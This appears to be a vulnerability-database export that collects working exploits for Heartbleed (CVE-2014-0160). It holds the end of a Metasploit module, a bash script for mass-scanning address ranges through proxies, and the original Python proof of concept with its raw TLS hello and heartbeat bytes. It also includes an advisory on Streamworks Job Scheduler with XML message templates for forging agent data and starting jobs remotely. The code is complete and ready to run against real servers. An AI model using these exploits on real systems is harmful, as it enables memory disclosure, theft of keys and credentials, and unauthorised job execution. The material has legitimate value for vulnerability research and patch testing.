TLS_VERSION = {\r\n '1.0' => 0x0301,\r\n '1.1' => 0x0302,\r\n '1.2' => 0x0303\r\n }\r\n\r\n TTLS_CALLBACKS = {\r\n 'SMTP' => :tls_smtp,\r\n 'IMAP' => :tls_imap,\r\n 'JABBER' => :tls_jabber,\r\n 'POP3' => :tls_pop3\r\n }\r\n\r\n def initialize\r\n super(\r\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Information Leak',\r\n 'Description' => %q{\r\n This module implements the OpenSSL Heartbleed attack. The problem\r\n exists in the handling of heartbeat requests, where a fake length can\r\n be used to leak memory data in the response. Services that support\r\n STARTTLS may also be vulnerable.\r\n },\r\n 'Author' => [\r\n 'Neel Mehta', # Vulnerability discovery\r\n 'Riku', # Vulnerability discovery\r\n 'Antti', # Vulnerability discovery\r\n 'Matti', # Vulnerability discovery\r\n 'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. This module is based on it.\r\n 'FiloSottile', # PoC site and tool\r\n 'Christian Mehlmauer', # Msf module\r\n 'wvu', # Msf module\r\n 'juan vazquez' # Msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-0160'],\r\n ['US-CERT-VU', '720951'],\r\n ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A'],\r\n ['URL', 'http://heartbleed.com/'],\r\n ['URL', 'https://github.com/FiloSottile/Heartbleed'],\r\n ['URL', 'https://gist.github.com/takeshixx/10107280'],\r\n ['URL', 'http://filippo.io/Heartbleed/']\r\n ],\r\n 'DisclosureDate' => 'Apr 7 2014',\r\n 'License' => MSF_LICENSE\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3' ]]),\r\n OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']])\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('XMPPDOMAIN', [ true, 'The XMPP Domain to use when Jabber is selected', 'localhost' ])\r\n ], self.class)\r\n\r\n end\r\n\r\n def peer\r\n \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def tls_smtp\r\n # https://tools.ietf.org/html/rfc3207\r\n sock.get_once\r\n sock.put(\"EHLO #{Rex::Text.rand_text_alpha(10)}\\n\")\r\n res = sock.get_once\r\n\r\n unless res && res =~ /STARTTLS/\r\n return nil\r\n end\r\n sock.put(\"STARTTLS\\n\")\r\n sock.get_once\r\n end\r\n\r\n def tls_imap\r\n # http://tools.ietf.org/html/rfc2595\r\n sock.get_once\r\n sock.put(\"a001 CAPABILITY\\r\\n\")\r\n res = sock.get_once\r\n unless res && res =~ /STARTTLS/i\r\n return nil\r\n end\r\n sock.put(\"a002 STARTTLS\\r\\n\")\r\n sock.get_once\r\n end\r\n\r\n def tls_pop3\r\n # http://tools.ietf.org/html/rfc2595\r\n sock.get_once\r\n sock.put(\"CAPA\\r\\n\")\r\n res = sock.get_once\r\n if res.nil? || res =~ /^-/ || res !~ /STLS/\r\n return nil\r\n end\r\n sock.put(\"STLS\\r\\n\")\r\n res = sock.get_once\r\n if res.nil? || res =~ /^-/\r\n return nil\r\n end\r\n res\r\n end\r\n\r\n def tls_jabber\r\n # http://xmpp.org/extensions/xep-0035.html\r\n msg = \"<?xml version='1.0' ?>\"\r\n msg << \"<stream:stream xmlns='jabber:client' \"\r\n msg << \"xmlns:stream='http://etherx.jabber.org/streams' \"\r\n msg << \"version='1.0' \"\r\n msg << \"to='#{datastore['XMPPDOMAIN']}'>\"\r\n sock.put(msg)\r\n res = sock.get\r\n if res.nil? || res =~ /stream:error/ || res !~ /starttls/i\r\n print_error(\"#{peer} - Jabber host unknown. Please try changing the XMPPDOMAIN option.\") if res && res =~ /<host-unknown/\r\n return nil\r\n end\r\n msg = \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\"\r\n sock.put(msg)\r\n sock.get_once\r\n end\r\n\r\n def run_host(ip)\r\n connect\r\n\r\n unless datastore['STARTTLS'] == 'None'\r\n vprint_status(\"#{peer} - Trying to start SSL via #{datastore['STARTTLS']}\")\r\n res = self.send(TTLS_CALLBACKS[datastore['STARTTLS']])\r\n if res.nil?\r\n vprint_error(\"#{peer} - STARTTLS failed...\")\r\n return\r\n end\r\n end\r\n\r\n vprint_status(\"#{peer} - Sending Client Hello...\")\r\n sock.put(client_hello)\r\n\r\n server_hello = sock.get\r\n unless server_hello.unpack(\"C\").first == HANDSHAKE_RECORD_TYPE\r\n vprint_error(\"#{peer} - Server Hello Not Found\")\r\n return\r\n end\r\n\r\n vprint_status(\"#{peer} - Sending Heartbeat...\")\r\n heartbeat_length = 16384\r\n sock.put(heartbeat(heartbeat_length))\r\n hdr = sock.get_once(5)\r\n if hdr.blank?\r\n vprint_error(\"#{peer} - No Heartbeat response...\")\r\n return\r\n end\r\n\r\n unpacked = hdr.unpack('Cnn')\r\n type = unpacked[0]\r\n version = unpacked[1] # must match the type from client_hello\r\n len = unpacked[2]\r\n\r\n # try to get the TLS error\r\n if type == ALERT_RECORD_TYPE\r\n res = sock.get_once(len)\r\n alert_unp = res.unpack('CC')\r\n alert_level = alert_unp[0]\r\n alert_desc = alert_unp[1]\r\n msg = \"Unknown error\"\r\n # http://tools.ietf.org/html/rfc5246#section-7.2\r\n case alert_desc\r\n when 0x46\r\n msg = \"Protocol error. Looks like the chosen protocol is not supported.\"\r\n end\r\n print_error(\"#{peer} - #{msg}\")\r\n disconnect\r\n return\r\n end\r\n\r\n unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLSVERSION']]\r\n vprint_error(\"#{peer} - Unexpected Heartbeat response\")\r\n disconnect\r\n return\r\n end\r\n\r\n vprint_status(\"#{peer} - Heartbeat response, checking if there is data leaked...\")\r\n heartbeat_data = sock.get_once(heartbeat_length) # Read the magic length...\r\n if heartbeat_data\r\n print_good(\"#{peer} - Heartbeat response with leak\")\r\n report_vuln({\r\n :host => rhost,\r\n :port => rport,\r\n :name => self.name,\r\n :refs => self.references,\r\n :info => \"Module #{self.fullname} successfully leaked info\"\r\n })\r\n vprint_status(\"#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}\")\r\n else\r\n vprint_error(\"#{peer} - Looks like there isn't leaked information...\")\r\n end\r\n end\r\n\r\n def heartbeat(length)\r\n payload = \"\\x01\" # Heartbeat Message Type: Request (1)\r\n payload << [length].pack(\"n\") # Payload Length: 16384\r\n\r\n ssl_record(HEARTBEAT_RECORD_TYPE, payload)\r\n end\r\n\r\n def client_hello\r\n # Use current day for TLS time\r\n time_temp = Time.now\r\n time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i\r\n\r\n hello_data = [TLS_VERSION[datastore['TLSVERSION']]].pack(\"n\") # Version TLS\r\n hello_data << [time_epoch].pack(\"N\") # Time in epoch format\r\n hello_data << Rex::Text.rand_text(28) # Random\r\n hello_data << \"\\x00\" # Session ID length\r\n hello_data << [CIPHER_SUITES.length * 2].pack(\"n\") # Cipher Suites length (102)\r\n hello_data << CIPHER_SUITES.pack(\"n*\") # Cipher Suites\r\n hello_data << \"\\x01\" # Compression methods length (1)\r\n hello_data << \"\\x00\" # Compression methods: null\r\n\r\n hello_data_extensions = \"\\x00\\x0f\" # Extension type (Heartbeat)\r\n hello_data_extensions << \"\\x00\\x01\" # Extension length\r\n hello_data_extensions << \"\\x01\" # Extension data\r\n\r\n hello_data << [hello_data_extensions.length].pack(\"n\")\r\n hello_data << hello_data_extensions\r\n\r\n data = \"\\x01\\x00\" # Handshake Type: Client Hello (1)\r\n data << [hello_data.length].pack(\"n\") # Length\r\n data << hello_data\r\n\r\n ssl_record(HANDSHAKE_RECORD_TYPE, data)\r\n end\r\n\r\n def ssl_record(type, data)\r\n record = [type, TLS_VERSION[datastore['TLSVERSION']], data.length].pack('Cnn')\r\n record << data\r\n end\r\nend\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22129"}], "packetstorm": [{"lastseen": "2016-12-05T22:12:31", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-23T00:00:00", "published": "2014-04-23T00:00:00", "href": "https://packetstormsecurity.com/files/126288/Mass-Bleed-20140423.html", "id": "PACKETSTORM:126288", "title": "Mass Bleed 20140423", "type": "packetstorm", "sourceData": "`#!/bin/bash \n# massbleed.sh 20140423 by 1N3 \n# http://treadstonesecurity.blogspot.ca \n# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy] \n# \n# This script has four main functions with the ability to proxy all connections: \n# 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16) \n# 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443) \n# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single) \n# 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet) \n# \n# PROXY: A proxy option has been added to scan and run the scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work. \n# USAGE EXAMPLES: \n# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy) \n# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy) \n# (example: sh massbleed.sh 127.0.0.1 single 0 proxy) \n# (example: sh massbleed.sh 192.168.0. subnet 0 proxy) \n# \n# Prerequisites: \n# Is the heartbleed POC present? \n# Is unicornscan installed? \n# Is nmap installed? \n \necho \"(--==== http://treadstonesecurity.blogspot.ca\" \necho \"(--==== massbleed.sh 20140423 by 1N3\" \necho \"\" \n \nHEARTBLEED=`ls heartbleed.py` \nUNICORNSCAN=`which unicornscan` \nNMAP=`which nmap` \nRANGE=$1 \nALL_PORTS=$2 \nCUSTOM_PORT=$3 \nPROXY=$4 \nPORT_RANGE=\"1-65000\" \n \nif [ \"$HEARTBLEED\" != \"heartbleed.py\" ]; then \necho \"(--==== heartbleed.py not found!\" \necho \"(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py\" \nexit \nfi \n \nif [ \"$UNICORNSCAN\" == \"\" ]; then \necho \"(--==== unicornscan not installed! Exiting...\" \nexit \nfi \n \nif [ \"$NMAP\" == \"\" ]; then \necho \"(--==== nmap not installed! Exiting...\" \nexit \nfi \n \nif [ -z \"$1\" ]; then \necho \"(--==== usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]\" \nexit \nfi \n \nif [ \"$PROXY\" = \"proxy\" ]; then \necho \"(--==== scanning via proxy...\" \nif [ \"$ALL_PORTS\" = \"single\" ]; then \nif [ \"$CUSTOM_PORT\" != \"0\" ]; then \necho \"(--==== Checking $RANGE:$CUSTOM_PORT\" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep Server 2> /dev/null \nelse \nfor a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; \ndo echo \"(--==== Checking $RANGE:\"$a && proxychains python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; \ndone; \nfi \nfi \nif [ \"$ALL_PORTS\" = \"subnet\" ]; then \nfor a in {1..254}; \ndo \necho \"Scanning: $RANGE$a\" \nfor b in `proxychains unicornscan \"$RANGE$a\" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; \ndo \necho \"$RANGE$a:$b\" \nproxychains python heartbleed.py $RANGE$a -p $b | grep Server; \ndone; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"port\" ]; then \nfor a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a:$CUSTOM_PORT&& proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep Server; \ndone; \nelse \nfor a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a && proxychains python heartbleed.py $a -p 443 | grep Server; \ndone \nfi \nelse \nif [ \"$ALL_PORTS\" = \"single\" ]; then \nfor a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; \ndo echo \"(--==== Checking $RANGE:\"$a && python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"subnet\" ]; then \nfor a in {1..254}; \ndo \necho \"Scanning: $RANGE$a\" \nfor b in `unicornscan \"$RANGE$a\" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; \ndo \necho \"$RANGE$a:$b\" \npython heartbleed.py $RANGE$a -p $b | grep Server; \ndone; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"port\" ]; then \nfor a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a:$CUSTOM_PORT&& python heartbleed.py $a -p $CUSTOM_PORT | grep Server; \ndone; \nelse \nfor a in `unicornscan $RANGE -p 443 | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a && python heartbleed.py $a -p 443 | grep Server; \ndone \nfi \nfi \n \necho \"(--==== scan complete!\" \nexit \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126288/massbleed.sh.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:25:07", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-08T00:00:00", "published": "2014-04-08T00:00:00", "href": "https://packetstormsecurity.com/files/126065/OpenSSL-TLS-Heartbeat-Extension-Memory-Disclosure.html", "id": "PACKETSTORM:126065", "type": "packetstorm", "title": "OpenSSL TLS Heartbeat Extension Memory Disclosure", "sourceData": "`#!/usr/bin/python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(hello) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(hb) \nhit_hb(s) \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126065/openssltls-disclose.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T18:50:49", "bulletinFamily": "exploit", "description": "", "modified": "2019-01-16T00:00:00", "published": "2019-01-16T00:00:00", "id": "PACKETSTORM:151177", "href": "https://packetstormsecurity.com/files/151177/Streamworks-Job-Scheduler-Release-7-Authentication-Weakness.html", "title": "Streamworks Job Scheduler Release 7 Authentication Weakness", "type": "packetstorm", "sourceData": "` \nAffected Products \nStreamworks Job Scheduler Release 7 (older/newer releases have not \nbeen tested) \n \nReferences \nSecuvera-SA-2016-01 \nhttps://www.secuvera.de/advisories/secuvera-SA-2016-01.txt (used for \nupdates) \nNo CVE number could be assigned (vendor not listed under \ncve.mitre.org/data/board/archives/2016-01/msg00015.html) \n \nSummary: \nArvato Systems Streamworks Job Scheduler is a software product for \nautomation purposes. It helps \n\"to plan, maintain, control and monitor all of your automatable IT \nprocesses\" (source: vendor product \nhomepage). It consists of different types of services: an \napplication server daemon, a processing \nserver daemon that controls one or multiple agent daemins \ninstalled on operating servers were workload \nhas to be done. \n \nDuring a penetration test at a customers site three weaknesses \nconcerning communication \nauthentication were discovered: \n \n1) All agents installed on server systems use the same X.509 \ncertificates and private key that \nwere issued by the vendor for authentication. \n \n2) The processing server component does not check received \nmessages properly for authenticity. \n \n3) Agents installed on servers do not check received messages \nproperly for authenticity \n \n4) Agents and processing servers are vulnerable against TLS \nHeartbleed attack (CVE-2014-0160 - \nsee https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160) \n \nEffect: \n1) If systems were compromised and authentication material is \nstolen, all certificates have to be \nrevoked and replaced. In addition, this expands the effect of \n3) to the entire environment, \nnot just single systems. \n \n2) An attacker with knwolegde of the message syntax of the product \nand the authentication material \nis able to add, change or delete data within the Streamworks database. \n \n3) An attacker with knowledge of the message syntax of the product \nand the authentication material \nis able to create new or execute available jobs on servers with \nagents installed located within \nthe same network. This can lead to a complete loss of integrity, \nconfidentiality or availability \nof the respective system or data stored/processed on it. \n \n4) An unauthenticated remote attacker is able to read content \nwithin system memory. \n \nVulnerable components and scripts: \nStreamworks Job Scheduler Processing Server Release 7.1 \nStreamworks Job Scheduler Agent Release 7.1 \nolder releases have not been tested \n \nExamples: \nIn the following, a sample to exploit 2) and 3) will be given. \nReplace Information within squared \nbrackets: \n \n2) By sending a the following XML-Message to a Processing server \nit is possible to change system \ninformation of a legitimate configured client as proof-of-concept. \nThe System OS Info was slightly \nchanged: \n \n<AgentNotifyStarted ProcessId=\"7044\" AgentVersion=\"3.1.36\"> \n<ComHeader Version=\"1.0\"> \n<MandatorCode>0100</MandatorCode> \n<MsgCreateTime>2016-02-24T10:26:11[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].745Z</MsgCreateTime> \n<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].963Z</MsgSendTime> \n<SourceEndpoint Address=\"0.0.0.0\" Port=\"30000\" SysId=\"[Hostname of \nlegitimate Client]\" /> \n<DestinationEndpoint Address=\"[FQDN of Processing server]\" \nPort=\"9600\" SysId=\"[FQDN of Proces \nsing server]\" /> \n<Sequence>0</Sequence> \n</ComHeader> \n<SystemInformation> \n<OsType>Windows</OsType> \n<OsInfo>Pentest Windows!</OsInfo> \n<OsLocale>de_DE.windows-1252</OsLocale> \n</SystemInformation> \n<KnownJobsList> \n</KnownJobsList> \n<FileTransferOptions Mode=\"ALL\" BlockSize=\"0\" /> \n<Cli CliOptions=\"Enabled\" /> \n</AgentNotifyStarted> \n \n \n------------- \n \n \n3) By sending a XML-Message of the following type to create and \nexecute a new job on a system \n<ServerRequestStartJob> \n<ComHeader Version=\"0.1\"> \n<MandatorCode>0100</MandatorCode> \n<MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgCreateTime> \n<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgSendTime> \n<SourceEndpoint Address=\"[FQDN of processing server]\" \nPort=\"9600\" SysId=\"[FQDN of processing \nserver]\" /> \n<DestinationEndpoint Address=\"[IP of Server with agent \ninstalled]\" Port=\"30000\" SysId=\"[Hostname of \nserver with agent installed]\" /> \n<Sequence>1</Sequence> \n<MandatorId>0100</MandatorId> \n</ComHeader> \n<JobStartInfo> \n<JobInfo ServerJobId=\"118291965_1\" ExecutionNo=\"1\" \nPlanDate=\"[YYYY]-[MM]-[DD]\" \nStreamName=\"[NewStreamName]\" JobName=\"[NewJobName]\" Run=\"1\" /> \n<UserName>[Username under which the agent should run the \nScript, e.g. LOCAL\\System]</UserName> \n<Password>[Add Password of the user if needed]</Password> \n<UseUserProfile>true</UseUserProfile> \n<MainScript>[base64-encoded Script code, e.g. \n\"cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl\" \nto start a notepad.exe on a Windows Host]</MainScript> \n<KeepJoblogDays>10</KeepJoblogDays> \n</JobStartInfo> \n</ServerRequestStartJob> \n \nSolution: \nInstall Streamworks Release 9.3 \n \n(https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html - page available \nin \ngerman only) \n \nDisclosure Timeline: \n2016/05/12 vulnerabilities discovered \n2016/05/30 vendor initially contacted \n2016/06/13 sales representative replied \n2016/06/14 technically responsible contact details received \n2016/07/01 technical personnel contacted, appointment to discuss \nfindings made \n2016/07/11 submitted technical details to responsible personnel \n2016/07/12 responsible product manager replied. Committed to \nextend disclosure timeline due to \ncomprehensible reasons. New disclosure timeline: end of \nSeptember 2016 \n2016/09/08 product manager replied, suggest meeting to discuss fixes \n2016/09/27 meeting took place, half of the vulnerabilities were \nfixed. Timeline until disclosure extended \nagain due to difficult changes. Disclosure timeline \nextended to end of April 2017 \n2017/04/20 Contacted vendor again to remind of the near end of the \ndisclosure timeline. \n2017/04/27 Reply and ongoing discussion about when the fix will be shipped. \n2017/05/20 Vendor replied that due to customers experience fewer \nreleases were made. The fix will be shipped \non the second quarter of 2018. Extended disclosure \ntimeline until the end of June 2018. \n2018/04/03 Contacted vendor as reminder and to get a release ship date. \n2018/04/09 Vendor replied saying that within release 9.3 (shipped \non 2nd quarter 2018) the issues will be fixed \nFinal disclosure timeline: 2019/01/14 after a \nsufficient grace period to customers to install the fixed \nrelease \n2019/01/14 public advisory disclosure \n \n \nCredits \nSimon Bieber, secuvera GmbH \nsbieber@secuvera.de \nhttps://www.secuvera.de \n \nDisclaimer: \nAll information is provided without warranty. The intent is to \nprovide informa- \ntion to secure infrastructure and/or systems, not to be able to \nattack or damage. \ntherefore secuvera shall not be liable for any direct or indirect \ndamages that \nmight be caused by using this information. \n \n \n \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/151177/secuvera-SA-2016-01.txt"}]}